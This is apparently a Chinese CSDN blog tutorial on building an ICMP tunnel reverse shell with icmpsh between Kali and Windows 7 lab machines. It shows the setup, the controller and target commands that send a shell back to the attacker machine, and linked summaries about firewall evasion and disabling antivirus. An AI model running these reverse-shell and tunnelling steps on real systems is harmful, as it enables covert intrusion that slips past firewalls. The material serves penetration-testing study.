用icmp反弹协议——icmpsh

最新推荐文章于 2024-03-25 09:48:00 发布
最新推荐文章于 2024-03-25 09:48:00 发布
阅读量335 收藏 2
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_50683638/article/details/115517617
版权

ICMP隧道

前言

一、ICMP(Internet Control Message Protocol)Internet控制报文协议。它是TCP/IP协议簇的一个子协议,用于在IP主机、路由器之间传递控制消息。控制消息是指网络通不通、主机是否可达、路由是否可用等网络本身的消息。这些控制消息虽然并不传输用户数据,但是对于用户数据的传递起着重要的作用。
常见的ICMP隧道工具有:icmpsh、PingTunnel、icmptunnel、powershell icmp等。

内容

开启两台虚拟机这里用到的是kali和windws 7

git clone https://github.com/inquisb/icmpsh.git
因已下载

使用icmpsh需要安装python的impacker库

sudo apt-get install python-impacket
若安装过程中出现这个错误:
在这里插入图片描述

只需要更新一下APT库就行了

sudo apt-get updatesudo apt-get upgrade

如果没下载pip先安装pip
首先下载并安装setuptools:
wget --no-check-certificate https://bootstrap.pypa.io/ez_setup.py
sudo python ez_setup.py --insecure
再到python官网下载pip安装包,解压到某个位置然后就可以安装了:
wget https://pypi.python.org/packages/11/b6/abcb525026a4be042b486df43905d6893fb04f05aac21c32c638e939e447/pip-9.0.1.tar.gz#md5=35f01da33009719497f01a4ba69d63c9
tar -xf pip-9.0.1.tar.gz
cd pip-9.0.1
sudo python setup.py install
ln -s /usr/local/python27/bin/pip /usr/bin/pip
安装impacketpip2 install impacket

在这里插入图片描述

关闭本地系统的ICMP答应

sysctl -w net.ipv4.icmp_echo_ignore_all=1
在这里插入图片描述

如果syssctl报错:

在这里插入图片描述

切换用户为root去sbin目录下执行:
/sbin/sysctl -p

在这里插入图片描述

如未报错继续:

在这里插入图片描述

输入攻击目标ip

在这里插入图片描述

会报以下错误:

在这里插入图片描述

于是使用icmpsh的python的脚本运行:

python icmpsh_m.py 192.168.88.109【kali】 192.168.88.139【win7】

然后在win7上运行:

icmpsh.exe -t 192.168.88.109
最后成功反弹shell到kali

北极之北.
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
icmpsh:基于 ICMP 的 shell 工具
gitblog_00096的博客
03-14 368
icmpsh:基于 ICMP 的 shell 工具 icmpsh 是一个基于 ICMP(Internet Control Message Protocol)的 shell 工具,它允许你通过 ICMP 请求在目标主机上执行命令并获取结果。 什么是 ICMPICMP(Internet Control Message Protocol)是 Internet 协议簇的一部分,用于在网络中发送控制...
HC110110004 ICMP协议
01-05
ICMP协议详解 ICMP(Internet Control Message Protocol,互联网控制报文协议)是网络层的一个重要协议ICMP协议用来在网络设备间传递各种差错和控制信息,并对于收集各种网络信息、诊断和排除各种网络故障等方面...
【渗透测试】ICMP隧道技术之icmpsh使用
SunnyCat
09-28 2074
【渗透测试】ICMP隧道技术之icmpsh使用 一、使用场景 icmp隧道技术多用于服务器未开启任何端口时,但能够通过icmp协议通讯,即能够ping通对方 二、icmpsh icmpsh是一个简单的ICMP反弹shell工具,拥有用C,Perl和Python实现的POSIX兼容主控端和一个win32的受控端。相比其他类似的开源工具来说,icmpsh的优点是在目标机器上运行时不需要管理员权限。 这一工具干净、简单并且便携。受控端(客户端)使用C语言实现。只能运行在目标Windows机器上,而主控端(服务端)
内网渗透系列:内网隧道之icmpsh
闵行小鱼塘
04-10 1400
本文研究ICMP隧道的一个工具,icmpsh
ssh隧道转发内网穿透功能实现(反弹式木-马原理)
weixin_34390105的博客
04-21 705
ssh说明 SSH(secure shell)是一种加密的网络传输协议,可在不安全的网络中为网络服务提供安全的传输环境(这点很重要);SSH通过在网络中创建安全隧道来实现SSH客户端与服务器之间的连接。人们通常利用SSH来传输命令行界面和远程执行命令;SSH也支持隧道协议、端口映射和X11连接。借助SFTP或SCP协议还可以传输文件等;闲话不说了,如需要详细了解ssh请自行搜索;我们通常接触最多的...
小工具icmpsh的基本操作
carmi的博客
03-10 323
小工具icmpsh的基本操作 基础介绍 原理:通过icmp这个协议进行反弹一个shell 前提条件:Kali(192.168.126.134)与Windows7(192.168.126.129)靶机需要在同一个网段(内网)当中,可以进行通信 操作流程 1、github上下载资源,复制进Kali,进行解压 GitHub - bdamele/icmpsh: Simple reverse ICMP s...
ICMP协议pcap数据包下载;ICMP协议报文解析
03-24
ICMP协议pcap数据包下载,支持抓包软件(如:wireshark)打开并学习ICMP协议报文解析。需要其他协议,请查看我发布的其他资源。
ICMP协议 作者文章电子版 需要的下载
06-03
ICMP(Internet Control Message Protocol)协议是互联网控制消息协议,它是IP协议的一部分,主要用于在网络中传输有关错误报告和控制信息。ICMP协议不用于传输数据,而是用来在IP层提供网络诊断和通信问题的反馈。 ...
ICMP协议详细解析与代码实例.txt
11-01
ICMP协议详细解析与代码实例.txt
ICMP.rar_ICMP PING_ICMP协议_icmp_协议栈_协议源码
09-22
**ICMP:互联网控制消息协议** 互联网控制消息协议ICMP)是TCP/IP协议族中的一个关键组件,它主要用于在Internet上报告错误和传递控制信息。ICMP报文由IP层处理,而不是由TCP或UDP等更高层次的传输协议处理。它的...
【渗透测试】ICMP隧道技术之icmpsh使用(含流量分析)
SunnyCat
09-29 2789
目录一、环境二、工具三、操作1、CentOS72、Win103、反弹成功四、C2流量分析1、正常的icmp流量2、恶意的icmp流量3、C2数据总结 一、环境 Win10:10.95.16.112 CentOS7:10.95.16.103 二、工具 icmpsh python2 三、操作 win10关闭防火墙,病毒检测,不然icmpsh.exe会被自动删除 centOS7安装python2对应的库文件用于支持icmpsh工具 pip2 install impacket 1、CentOS7 sysctl
探秘 ICMPsh:一款隐蔽而强大的远程控制工具
gitblog_00011的博客
03-25 428
探秘 ICMPsh:一款隐蔽而强大的远程控制工具 项目地址:https://gitcode.com/inquisb/icmpsh 项目简介 ICMPsh 是一个开源项目,它允许你在网络中利用ICMP协议进行数据传输和远程控制。这个项目旨在提供一种隐秘的方式来进行系统管理,因为大多数防火墙默认对ICMP(Internet Control Message Protocol)报文是开放的,使得ICMPs...
【渗透测试笔记】之【内网渗透——网络层隧道(icmpsh、PingTunnel的使用:icmp隧道反向shell、本地端口转发)】
AA8j的博客
10-14 628
拓扑图 ICMP隧道 条件:能ping通主机。
利用icmpsh建立icmp隧道反弹shell
huayimy的博客
12-29 752
利用icmpsh建立icmp隧道反弹shell,安装pip2,安装impacket模块,raise ReadTimeoutError,Failed to build future
ICMPSH的学习ICMP反弹shell
来到了学渣的博客
06-04 1358
ICMP隧道 最常见的ping命令就是利用的ICMP协议,使用该协议反弹shell,两台机器不需要开放端口,ICMP隧道简单好用。 实验环境 Kali 192.168.10.144 win7 192.168.10.129 kali安装好icmpsh工具 root@kali:~# git clone https://github.com/inquisb/icmpsh.git 安装icmpsh的依赖包 root@kali:~# apt-get install python-impacket 执行之前最重要
内网渗透之 ICMP(icmpsh) 协议反弹Shell
The current road is different, love needs to distinguish between right and wrong
04-09 5065
简介 最常见的ICMP消息为Ping命令的回复,通过ping命令访问远程计算机,尝试进行ICMP隧道,将TCP/UDP数据封装到ICMP的ping数据包中,从而穿过防火墙(通常防火墙不会屏蔽ping数据包)。 常见的ICMP隧道工具有:icmpsh、PingTunnel、icmptunnel、powershell icmp等。 这里使用 icmpsh跨平台工具,python版本 < python3。 实验环境 kali:192.168.95.128 windows7:192.168.9
隐藏通信隧道技术之icmpsh反弹shell(网络层ICMP隧道)
bring_coco的博客
01-05 774
优势:不需要开放端口就能通信 常见ICMP的消息是ping命令,通过ping可以得到一些回复 如果HTTP,DNS正反向端口转发不行时候可以尝试ICMP隧道 建立基础:只要能ping通,可以将TCP/UDP数据封装到数据包中,然后利用ping的数据包来穿透防火墙。 实验环境: 1.虚拟机中进行 (kali作为外网机器,monowall1是分隔内外网的防火墙,win7,win2012是两台内网机器) 2.kali的ip:10.0.78.29 Monowall1的ip:1.1.1.1 Win7的ip:1.1.
ICMP隧道技术 - icmpsh
shawdow_bug的博客
09-12 964
ICMP隧道工具 icmpsh 使用。
【内网流量操控技术六】icmp隧道之icmpsh
redwand的博客
02-11 1578
今天是大年三十,先给大家拜个早年,虽然是年末最后一天,但对于有技术信仰的我们来说,其实每一天都是第0天,遂积跬步,记录一篇。前面我们学习了ssh隧道、dns隧道,这些隧道从tcp/ip七层协议来看,多是通过应用层或传输层协议穿透防火墙。那么当防火墙如果不开任何端口,我们应该如何穿透绕过防火墙出站规则呢,本节我们通过学习icmpsh来解决服务器未开端口时,如何通过icmp隧道穿透防火墙,其原理虽然简单,但动手一试发现有很多坑值得避免。
Wireshark抓包——ICMP协议分析实验分析
最新发布
06-16
Wireshark是一款强大的网络协议分析工具,它可以捕获和分析网络数据包,包括Internet Control Message Protocol (ICMP) 协议。在进行ICMP协议分析实验时,你会: 1. **启动抓包**:首先,打开Wireshark,通常选择...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值